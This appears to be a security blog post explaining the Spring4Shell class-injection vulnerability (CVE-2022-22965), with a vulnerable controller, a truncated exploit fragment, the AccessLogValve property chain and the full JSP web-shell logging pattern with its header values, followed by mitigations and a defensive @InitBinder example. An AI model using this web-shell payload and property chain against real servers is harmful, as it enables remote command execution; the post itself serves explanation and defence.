Spring4Shell as a class injection example

Two serious vulnerabilities leading to remote code execution (RCE) have been found in the popular Spring framework: one in Spring Core (Spring4Shell, CVE-2022-22965, the class injection bug discussed here) and the other in Spring Cloud Function (CVE-2022-22963, a SpEL expression injection through a request header).

Credit: LunaSec

$ curl ''
$ # wait, what?

@ModelAttribute example. Spring binds request parameters onto the Greeting bean by property path, and a path may descend into nested properties; on JDK 9+ that lets a parameter named like class.module.classLoader... reach the web application's class loader through Greeting.getClass():

	import org.springframework.stereotype.Controller;
	import org.springframework.ui.Model;
	import org.springframework.web.bind.annotation.ModelAttribute;
	import org.springframework.web.bind.annotation.PostMapping;

	public class Greeting {
		private long id;
		public long getId() { return id; }
		public void setId(long id) { this.id = id; }
	}

	@Controller
	public class HelloController {
		@PostMapping("/greeting")
		public String greetingSubmit(@ModelAttribute Greeting greeting, Model model) {
			return "hello";
		}
	}

Class injection exploitation example (the request URL is truncated in the source; only the tail of the URL-encoded pattern property survives, decoding to `!=-1){ out.println(new String(b)); } %{suffix}i`):

!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di

A series of such requests sets the properties of Tomcat's AccessLogValve through the property path class.module.classLoader.resources.context.parent.pipeline.first.* (directory, prefix, suffix, fileDateFormat and pattern), so that the access log is written as shell.jsp inside the web root with the following logging pattern:

%{prefix}i java.io.InputStream in = %{c}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %{suffix}i

In Tomcat's access log syntax, %{name}i expands to the value of the request header name. Because % is a directive character in the pattern itself, the JSP delimiters and the class name are smuggled in as headers of the same request (prefix: <%, c: Runtime, suffix: %>); the log line Tomcat then writes is a valid JSP, and a request to shell.jsp?cmd=... runs the command.


What to do about it:

  • do not deserialize data you do not trust; prefer formats that cannot instantiate arbitrary classes
  • do not ever allow passing serialized data as arguments
  • research how your parsers treat object creation, metadata and language extensions (Spring's data binder treats a request parameter name as a nested property path, which is how the class property becomes reachable)
  • validate user input, and limit what the binder may populate: for Spring4Shell that means upgrading to Spring Framework 5.3.18 / 5.2.20 or later and, as defence in depth, registering an @InitBinder that disallows the class.*, Class.*, *.class.* and *.Class.* field patterns
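The binder-level hardening from the last point, as an added example (not code from the original post or from the Spring project; the class name BinderControllerAdvice is my own, the field patterns are the ones from the Spring4Shell advisory, and spring-webmvc must be on the classpath):

```java
import org.springframework.core.Ordered;
import org.springframework.core.annotation.Order;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;

// Added example: a global @InitBinder that applies to every @ModelAttribute binding
// in every controller of the application.
@ControllerAdvice
@Order(Ordered.LOWEST_PRECEDENCE) // ranks this among other @ControllerAdvice beans only
public class BinderControllerAdvice {

    // Property paths the binder must never walk. The Spring4Shell chain starts at the
    // bean's "class" property (Greeting.class.module.classLoader...), so any path that
    // begins with or contains a class/Class segment is suppressed instead of bound.
    private static final String[] DISALLOWED_FIELDS = {
        "class.*", "Class.*", "*.class.*", "*.Class.*"
    };

    @InitBinder
    public void setDisallowedFields(WebDataBinder binder) {
        binder.setDisallowedFields(DISALLOWED_FIELDS);
    }
}
```

One caveat a practitioner should check: @InitBinder methods declared in a controller run after the global ones and setDisallowedFields replaces the whole list, so a controller that calls binder.setDisallowedFields("...") for its own purposes silently drops these patterns again. Audit every local @InitBinder, and treat the advice as defence in depth on top of the framework upgrade rather than as a substitute for it.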
